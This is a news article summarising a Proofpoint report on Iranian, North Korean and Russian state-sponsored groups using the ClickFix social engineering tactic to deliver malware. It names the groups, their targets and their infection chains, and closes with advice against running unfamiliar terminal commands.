Security researchers have observed multiple state-sponsored hacking groups from Iran, North Korea, and Russia using the ClickFix social engineering tactic to deploy malware. The technique was already popular among cybercriminals, and its effectiveness seems to have caught the eye of some major hacking groups.
In a nutshell, ClickFix is a social engineering tactic that convinces a victim to infect their own machine by following a series of steps, often involving running a command in a terminal, under the guise of fixing a problem. Other excuses for getting users to run commands include solving a CAPTCHA and registering or verifying their device.
The adoption was spotted by researchers at Proofpoint Security, who claim in their report that the “technique will likely become more widely tested or adopted by state-sponsored actors.” Currently, ClickFix isn’t revolutionising entire campaigns, but is instead replacing the installation and execution stages in existing infection chains.
Researchers first spotted threat group Kimsuky, also tracked as TA427, using ClickFix in January and February in a phishing campaign targeting individuals “in fewer than five organisations in the think tank sector with a new infection chain.” Since then, other threat actors like MuddyWater and APT28 have also joined the party.
MuddyWater’s ClickFix campaign was much larger in scale compared to TA427. It targeted the finance, government, health, education, and transportation sectors in the Middle East, with a particular focus on Saudi Arabia and the United Arab Emirates (UAE). Some companies located in North America and Europe were also targeted.
Another popular campaign came from a Russian hacking group known as UNK_RemoteRogue towards the end of 2024. The campaign used fake emails sent from potentially compromised Zimbra servers, which included a link to a Microsoft Office document. This document contained instructions on how to run a command in Windows PowerShell. The command itself contained JavaScript that executed code linked with the Empire command-and-control framework.
Proofpoint’s report clearly shows state-sponsored hackers from multiple countries taking an interest in the ClickFix tactic to deploy malware at later stages in their respective attack chains. The tactic itself isn’t difficult to spot, and anyone with even a minor understanding of Windows terminal commands should be able to spot them a mile away. Even if you don’t understand Windows terminal commands, it’s not a good idea to run a random command you find on the internet, or worse, your inbox with admin permissions on your system.
In the News: Cisco patches high-severity flaw in Webex client
